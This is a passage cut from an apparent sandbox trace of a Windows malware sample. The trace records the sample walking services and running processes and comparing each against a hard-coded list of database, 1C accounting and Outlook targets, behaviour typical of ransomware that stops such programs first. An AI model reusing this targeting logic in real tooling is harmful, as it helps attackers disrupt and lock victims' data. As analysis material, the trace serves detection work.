returned -1 [0034.485] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0034.485] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0034.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0034.485] lstrlenW (lpString="ProfSvc") returned 7 [0034.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0034.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0034.485] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0034.486] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0034.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0034.486] lstrlenW (lpString="RpcEptMapper") returned 12 [0034.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0034.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0034.486] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0034.486] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0034.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0034.486] lstrlenW (lpString="RpcSs") returned 5 [0034.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0034.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0034.486] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0034.486] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0034.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0034.486] lstrlenW (lpString="SamSs") returned 5 [0034.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0034.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0034.486] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0034.486] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0034.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0034.486] lstrlenW (lpString="Schedule") returned 8 [0034.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0034.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0034.486] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0034.486] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0034.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0034.486] lstrlenW (lpString="SENS") returned 4 [0034.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0034.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0034.486] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0034.486] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0034.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0034.487] lstrlenW (lpString="ShellHWDetection") returned 16 [0034.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0034.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0034.487] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0034.487] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0034.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0034.487] lstrlenW (lpString="Spooler") returned 7 [0034.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0034.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0034.487] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0034.487] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0034.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0034.487] lstrlenW (lpString="SysMain") returned 7 [0034.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0034.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0034.487] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0034.487] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0034.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0034.487] lstrlenW (lpString="Themes") returned 6 [0034.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0034.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0034.487] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0034.487] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0034.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0034.487] lstrlenW (lpString="TrkWks") returned 6 [0034.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0034.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0034.487] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0034.487] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0034.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0034.487] lstrlenW (lpString="UxSms") returned 5 [0034.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0034.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0034.488] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0034.488] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0034.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0034.488] lstrlenW (lpString="WdiServiceHost") returned 14 [0034.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0034.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0034.488] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0034.488] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0034.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0034.488] lstrlenW (lpString="WdiSystemHost") returned 13 [0034.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0034.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0034.488] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0034.488] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0034.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0034.488] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0034.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0034.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0034.488] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0034.488] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0034.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0034.488] lstrlenW (lpString="Winmgmt") returned 7 [0034.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0034.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0034.488] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0034.488] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0034.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0034.488] lstrlenW (lpString="WPDBusEnum") returned 10 [0034.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0034.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0034.488] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0034.488] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0034.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0034.489] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2ec0090 | out: hHeap=0xb10000) returned 1 [0034.489] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x164 [0034.495] Process32FirstW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0034.495] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0034.496] lstrlenW (lpString="System") returned 6 [0034.496] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0034.496] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0034.496] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0034.496] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0034.496] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0034.496] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0034.496] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0034.496] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0034.497] lstrlenW (lpString="smss.exe") returned 8 [0034.497] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0034.497] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0034.497] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0034.497] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0034.497] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0034.497] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0034.497] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0034.497] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0034.498] lstrlenW (lpString="csrss.exe") returned 9 [0034.498] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0034.498] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0034.498] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0034.498] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0034.498] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0034.498] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0034.498] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0034.498] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0034.499] lstrlenW (lpString="wininit.exe") returned 11 [0034.499] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0034.499] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0034.499] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0034.499] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0034.499] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0034.499] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0034.499] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0034.499] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0034.500] lstrlenW (lpString="csrss.exe") returned 9 [0034.500] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0034.500] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0034.500] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0034.500] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0034.500] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0034.500] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0034.500] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0034.501] lstrlenW (lpString="winlogon.exe") returned 12 [0034.501] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0034.501] lstrlenW (lpString="services.exe") returned 12 [0034.501] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0034.502] lstrlenW (lpString="lsass.exe") returned 9 [0034.502] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0034.503] lstrlenW (lpString="lsm.exe") returned 7 [0034.503] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.504] lstrlenW (lpString="svchost.exe") returned 11 [0034.504] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.504] lstrlenW (lpString="svchost.exe") returned 11 [0034.504] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.505] lstrlenW (lpString="svchost.exe") returned 11 [0034.505] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.506] lstrlenW (lpString="svchost.exe") returned 11 [0034.506] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.506] lstrlenW (lpString="svchost.exe") returned 11 [0034.507] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0034.507] lstrlenW (lpString="audiodg.exe") returned 11 [0034.507] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.508] lstrlenW (lpString="svchost.exe") returned 11 [0034.508] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.509] lstrlenW (lpString="svchost.exe") returned 11 [0034.509] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0034.510] lstrlenW (lpString="dwm.exe") returned 7 [0034.510] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0034.510] lstrlenW (lpString="explorer.exe") returned 12 [0034.510] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0034.511] lstrlenW (lpString="spoolsv.exe") returned 11 [0034.511] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0034.512] lstrlenW (lpString="taskhost.exe") returned 12 [0034.512] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.513] lstrlenW (lpString="svchost.exe") returned 11 [0034.513] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0034.513] lstrlenW (lpString="taskeng.exe") returned 11 [0034.513] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0034.514] lstrlenW (lpString="taskhost.exe") returned 12 [0034.514] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0034.515] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0034.515] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0034.515] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0034.515] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0034.516] lstrlenW (lpString="sa_shape.exe") returned 12 [0034.516] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0034.517] lstrlenW (lpString="confidence.exe") returned 14 [0034.517] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0034.518] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0034.518] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0034.518] lstrlenW (lpString="blue.exe") returned 8 [0034.518] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0034.519] lstrlenW (lpString="newly debut.exe") returned 15 [0034.519] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0034.520] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0034.520] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0034.520] lstrlenW (lpString="archive.exe") returned 11 [0034.520] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0034.521] lstrlenW (lpString="defend.exe") returned 10 [0034.521] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0034.522] lstrlenW (lpString="arservice.exe") returned 13 [0034.522] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0034.523] lstrlenW (lpString="rr-programmer.exe") returned 17 [0034.523] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0034.523] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0034.523] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0034.524] lstrlenW (lpString="twistedmonton.exe") returned 17 [0034.524] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0034.548] lstrlenW (lpString="arc plains.exe") returned 14 [0034.548] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0034.549] lstrlenW (lpString="americahousestip.exe") returned 20 [0034.549] Process32NextW (in: hSnapshot=0x164, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, 